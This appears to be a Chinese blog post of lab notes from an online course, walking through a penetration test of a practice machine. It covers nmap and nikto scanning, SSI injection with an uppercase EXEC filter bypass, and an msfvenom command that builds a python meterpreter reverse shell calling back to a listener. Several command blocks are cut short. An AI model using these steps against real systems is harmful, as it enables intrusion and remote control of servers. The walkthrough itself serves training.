【网络安全0x09】SSI漏洞注入
51CTO的网课,本篇利用nmap搜索开放端口,nikto、dirb挖掘敏感目录,利用SSI漏洞进行代码注入,执行python反弹shell,使用metasploit监听,获得shell。
本篇使用工具metasploit。
使用命令
SSI
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
metasploit
1 | #生成shell |
渗透记录
- nmap扫描靶机IP地址开放端口,一个web服务,
nikto
挖掘80
端口web信息:
1 | nmap -sV 192.168.1.118 |
- 访问页面,
.shtml
的后缀可能有ssi漏洞可以利用:
- 测试命令,大写
EXEC
绕过过滤:
- 生成shell:
1 | msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444 -f raw > shell.py |
- 开启监听:
1 | msfconsole |
- 复制shell到apache根目录下,开启apache服务:
- 网页SSI注入命令下载shell脚本:
- 修改shell脚本权限,增加可执行权限:
- 注入执行命令,msf获得反弹shell:
- 官方教程说本机没有设置flag,不过权限不够也访问不了
/root
,尝试提权无从下手,太菜了,以后再回来看看。